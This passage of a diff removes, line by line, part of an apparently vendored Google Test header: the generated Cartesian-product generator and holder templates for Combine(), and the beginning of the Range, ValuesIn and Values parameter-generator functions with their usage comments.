-        end9_(other.end9_),
-        current9_(other.current9_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_, *current8_,
-            *current9_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_ ||
-          current8_ == end8_ ||
-          current9_ == end9_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    const typename ParamGenerator<T8>::iterator begin8_;
-    const typename ParamGenerator<T8>::iterator end8_;
-    typename ParamGenerator<T8>::iterator current8_;
-    const typename ParamGenerator<T9>::iterator begin9_;
-    const typename ParamGenerator<T9>::iterator end9_;
-    typename ParamGenerator<T9>::iterator current9_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator9::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator9& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-  const ParamGenerator<T8> g8_;
-  const ParamGenerator<T9> g9_;
-};  // class CartesianProductGenerator9
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-class CartesianProductGenerator10
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7, T8, T9, T10> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> ParamType;
-
-  CartesianProductGenerator10(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7,
-      const ParamGenerator<T8>& g8, const ParamGenerator<T9>& g9,
-      const ParamGenerator<T10>& g10)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9), g10_(g10) {}
-  virtual ~CartesianProductGenerator10() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin(), g8_, g8_.begin(), g9_, g9_.begin(), g10_, g10_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end(), g8_,
-        g8_.end(), g9_, g9_.end(), g10_, g10_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7,
-      const ParamGenerator<T8>& g8,
-      const typename ParamGenerator<T8>::iterator& current8,
-      const ParamGenerator<T9>& g9,
-      const typename ParamGenerator<T9>::iterator& current9,
-      const ParamGenerator<T10>& g10,
-      const typename ParamGenerator<T10>::iterator& current10)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7),
-          begin8_(g8.begin()), end8_(g8.end()), current8_(current8),
-          begin9_(g9.begin()), end9_(g9.end()), current9_(current9),
-          begin10_(g10.begin()), end10_(g10.end()), current10_(current10)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current10_;
-      if (current10_ == end10_) {
-        current10_ = begin10_;
-        ++current9_;
-      }
-      if (current9_ == end9_) {
-        current9_ = begin9_;
-        ++current8_;
-      }
-      if (current8_ == end8_) {
-        current8_ = begin8_;
-        ++current7_;
-      }
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_ &&
-          current8_ == typed_other->current8_ &&
-          current9_ == typed_other->current9_ &&
-          current10_ == typed_other->current10_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_),
-        begin8_(other.begin8_),
-        end8_(other.end8_),
-        current8_(other.current8_),
-        begin9_(other.begin9_),
-        end9_(other.end9_),
-        current9_(other.current9_),
-        begin10_(other.begin10_),
-        end10_(other.end10_),
-        current10_(other.current10_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_, *current8_,
-            *current9_, *current10_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_ ||
-          current8_ == end8_ ||
-          current9_ == end9_ ||
-          current10_ == end10_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    const typename ParamGenerator<T8>::iterator begin8_;
-    const typename ParamGenerator<T8>::iterator end8_;
-    typename ParamGenerator<T8>::iterator current8_;
-    const typename ParamGenerator<T9>::iterator begin9_;
-    const typename ParamGenerator<T9>::iterator end9_;
-    typename ParamGenerator<T9>::iterator current9_;
-    const typename ParamGenerator<T10>::iterator begin10_;
-    const typename ParamGenerator<T10>::iterator end10_;
-    typename ParamGenerator<T10>::iterator current10_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator10::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator10& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-  const ParamGenerator<T8> g8_;
-  const ParamGenerator<T9> g9_;
-  const ParamGenerator<T10> g10_;
-};  // class CartesianProductGenerator10
-
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Helper classes providing Combine() with polymorphic features. They allow
-// casting CartesianProductGeneratorN<T> to ParamGenerator<U> if T is
-// convertible to U.
-//
-template <class Generator1, class Generator2>
-class CartesianProductHolder2 {
- public:
-CartesianProductHolder2(const Generator1& g1, const Generator2& g2)
-      : g1_(g1), g2_(g2) {}
-  template <typename T1, typename T2>
-  operator ParamGenerator< ::testing::tuple<T1, T2> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2> >(
-        new CartesianProductGenerator2<T1, T2>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder2& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-};  // class CartesianProductHolder2
-
-template <class Generator1, class Generator2, class Generator3>
-class CartesianProductHolder3 {
- public:
-CartesianProductHolder3(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3)
-      : g1_(g1), g2_(g2), g3_(g3) {}
-  template <typename T1, typename T2, typename T3>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3> >(
-        new CartesianProductGenerator3<T1, T2, T3>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder3& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-};  // class CartesianProductHolder3
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4>
-class CartesianProductHolder4 {
- public:
-CartesianProductHolder4(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4) {}
-  template <typename T1, typename T2, typename T3, typename T4>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4> >(
-        new CartesianProductGenerator4<T1, T2, T3, T4>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder4& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-};  // class CartesianProductHolder4
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5>
-class CartesianProductHolder5 {
- public:
-CartesianProductHolder5(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5> >(
-        new CartesianProductGenerator5<T1, T2, T3, T4, T5>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder5& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-};  // class CartesianProductHolder5
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6>
-class CartesianProductHolder6 {
- public:
-CartesianProductHolder6(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6> >(
-        new CartesianProductGenerator6<T1, T2, T3, T4, T5, T6>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder6& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-};  // class CartesianProductHolder6
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7>
-class CartesianProductHolder7 {
- public:
-CartesianProductHolder7(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-      T7> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7> >(
-        new CartesianProductGenerator7<T1, T2, T3, T4, T5, T6, T7>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder7& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-};  // class CartesianProductHolder7
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7,
-    class Generator8>
-class CartesianProductHolder8 {
- public:
-CartesianProductHolder8(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7, const Generator8& g8)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7),
-          g8_(g8) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7, typename T8>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7,
-      T8> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8> >(
-        new CartesianProductGenerator8<T1, T2, T3, T4, T5, T6, T7, T8>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_),
-        static_cast<ParamGenerator<T8> >(g8_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder8& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-  const Generator8 g8_;
-};  // class CartesianProductHolder8
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7,
-    class Generator8, class Generator9>
-class CartesianProductHolder9 {
- public:
-CartesianProductHolder9(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7, const Generator8& g8,
-    const Generator9& g9)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7, typename T8, typename T9>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8,
-      T9> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8,
-        T9> >(
-        new CartesianProductGenerator9<T1, T2, T3, T4, T5, T6, T7, T8, T9>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_),
-        static_cast<ParamGenerator<T8> >(g8_),
-        static_cast<ParamGenerator<T9> >(g9_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder9& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-  const Generator8 g8_;
-  const Generator9 g9_;
-};  // class CartesianProductHolder9
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7,
-    class Generator8, class Generator9, class Generator10>
-class CartesianProductHolder10 {
- public:
-CartesianProductHolder10(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7, const Generator8& g8,
-    const Generator9& g9, const Generator10& g10)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9), g10_(g10) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7, typename T8, typename T9, typename T10>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9,
-      T10> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9,
-        T10> >(
-        new CartesianProductGenerator10<T1, T2, T3, T4, T5, T6, T7, T8, T9,
-            T10>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_),
-        static_cast<ParamGenerator<T8> >(g8_),
-        static_cast<ParamGenerator<T9> >(g9_),
-        static_cast<ParamGenerator<T10> >(g10_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder10& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-  const Generator8 g8_;
-  const Generator9 g9_;
-  const Generator10 g10_;
-};  // class CartesianProductHolder10
-
-# endif  // GTEST_HAS_COMBINE
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  //  GTEST_HAS_PARAM_TEST
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_GENERATED_H_
-
-#if GTEST_HAS_PARAM_TEST
-
-namespace testing {
-
-// Functions producing parameter generators.
-//
-// Google Test uses these generators to produce parameters for value-
-// parameterized tests. When a parameterized test case is instantiated
-// with a particular generator, Google Test creates and runs tests
-// for each element in the sequence produced by the generator.
-//
-// In the following sample, tests from test case FooTest are instantiated
-// each three times with parameter values 3, 5, and 8:
-//
-// class FooTest : public TestWithParam<int> { ... };
-//
-// TEST_P(FooTest, TestThis) {
-// }
-// TEST_P(FooTest, TestThat) {
-// }
-// INSTANTIATE_TEST_CASE_P(TestSequence, FooTest, Values(3, 5, 8));
-//
-
-// Range() returns generators providing sequences of values in a range.
-//
-// Synopsis:
-// Range(start, end)
-//   - returns a generator producing a sequence of values {start, start+1,
-//     start+2, ..., }.
-// Range(start, end, step)
-//   - returns a generator producing a sequence of values {start, start+step,
-//     start+step+step, ..., }.
-// Notes:
-//   * The generated sequences never include end. For example, Range(1, 5)
-//     returns a generator producing a sequence {1, 2, 3, 4}. Range(1, 9, 2)
-//     returns a generator producing {1, 3, 5, 7}.
-//   * start and end must have the same type. That type may be any integral or
-//     floating-point type or a user defined type satisfying these conditions:
-//     * It must be assignable (have operator=() defined).
-//     * It must have operator+() (operator+(int-compatible type) for
-//       two-operand version).
-//     * It must have operator<() defined.
-//     Elements in the resulting sequences will also have that type.
-//   * Condition start < end must be satisfied in order for resulting sequences
-//     to contain any elements.
-//
-template <typename T, typename IncrementT>
-internal::ParamGenerator<T> Range(T start, T end, IncrementT step) {
-  return internal::ParamGenerator<T>(
-      new internal::RangeGenerator<T, IncrementT>(start, end, step));
-}
-
-template <typename T>
-internal::ParamGenerator<T> Range(T start, T end) {
-  return Range(start, end, 1);
-}
-
-// ValuesIn() function allows generation of tests with parameters coming from
-// a container.
-//
-// Synopsis:
-// ValuesIn(const T (&array)[N])
-//   - returns a generator producing sequences with elements from
-//     a C-style array.
-// ValuesIn(const Container& container)
-//   - returns a generator producing sequences with elements from
-//     an STL-style container.
-// ValuesIn(Iterator begin, Iterator end)
-//   - returns a generator producing sequences with elements from
-//     a range [begin, end) defined by a pair of STL-style iterators. These
-//     iterators can also be plain C pointers.
-//
-// Please note that ValuesIn copies the values from the containers
-// passed in and keeps them to generate tests in RUN_ALL_TESTS().
-//
-// Examples:
-//
-// This instantiates tests from test case StringTest
-// each with C-string values of "foo", "bar", and "baz":
-//
-// const char* strings[] = {"foo", "bar", "baz"};
-// INSTANTIATE_TEST_CASE_P(StringSequence, SrtingTest, ValuesIn(strings));
-//
-// This instantiates tests from test case StlStringTest
-// each with STL strings with values "a" and "b":
-//
-// ::std::vector< ::std::string> GetParameterStrings() {
-//   ::std::vector< ::std::string> v;
-//   v.push_back("a");
-//   v.push_back("b");
-//   return v;
-// }
-//
-// INSTANTIATE_TEST_CASE_P(CharSequence,
-//                         StlStringTest,
-//                         ValuesIn(GetParameterStrings()));
-//
-//
-// This will also instantiate tests from CharTest
-// each with parameter values 'a' and 'b':
-//
-// ::std::list<char> GetParameterChars() {
-//   ::std::list<char> list;
-//   list.push_back('a');
-//   list.push_back('b');
-//   return list;
-// }
-// ::std::list<char> l = GetParameterChars();
-// INSTANTIATE_TEST_CASE_P(CharSequence2,
-//                         CharTest,
-//                         ValuesIn(l.begin(), l.end()));
-//
-template <typename ForwardIterator>
-internal::ParamGenerator<
-  typename ::testing::internal::IteratorTraits<ForwardIterator>::value_type>
-ValuesIn(ForwardIterator begin, ForwardIterator end) {
-  typedef typename ::testing::internal::IteratorTraits<ForwardIterator>
-      ::value_type ParamType;
-  return internal::ParamGenerator<ParamType>(
-      new internal::ValuesInIteratorRangeGenerator<ParamType>(begin, end));
-}
-
-template <typename T, size_t N>
-internal::ParamGenerator<T> ValuesIn(const T (&array)[N]) {
-  return ValuesIn(array, array + N);
-}
-
-template <class Container>
-internal::ParamGenerator<typename Container::value_type> ValuesIn(
-    const Container& container) {
-  return ValuesIn(container.begin(), container.end());
-}
-
-// Values() allows generating tests from explicitly specified list of
-// parameters.
-//
-// Synopsis:
-// Values(T v1, T v2, ..., T vN)
-//   - returns a generator producing sequences with elements v1, v2, ..., vN.
-//
-// For example, this instantiates tests from test case BarTest each
-// with values "one", "two", and "three":
-//
-// INSTANTIATE_TEST_CASE_P(NumSequence, BarTest, Values("one", "two", "three"));
-//
-// This instantiates tests from test case BazTest each with values 1, 2, 3.5.
-// The exact type of values will depend on the type of parameter in BazTest.
-//
-// INSTANTIATE_TEST_CASE_P(FloatingNumbers, BazTest, Values(1, 2, 3.5));
-//
-// Currently, Values() supports from 1 to 50 parameters.
-//
-template <typename T1>
-internal::ValueArray1<T1> Values(T1 v1) {
-  return internal::ValueArray1<T1>(v1);
-}
-
-template <typename T1, typename T2>
-internal::ValueArray2<T1, T2> Values(T1 v1, T2 v2) {
-  return internal::ValueArray2<T1, T2>(v1, v2);
-}
-
-template <typename T1, typename T2, typename T3>
-internal::ValueArray3<T1, T2, T3> Values(T1 v1, T2 v2, T3 v3) {
-  return internal::ValueArray3<T1, T2, T3>(v1, v2, v3);
-}
-
-template <typename T1, typename T2, typename T3, typename T4>
-internal::ValueArray4<T1, T2, T3, T4> Values(T1 v1, T2 v2, T3 v3, T4 v4) {
-  return internal::ValueArray4<T1, T2, T3, T4>(v1, v2, v3, v4);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-internal::ValueArray5<T1, T2, T3, T4, T5> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5) {
-  return internal::ValueArray5<T1, T2, T3, T4, T5>(v1, v2, v3, v4, v5);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-internal::ValueArray6<T1, T2, T3, T4, T5, T6> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6) {
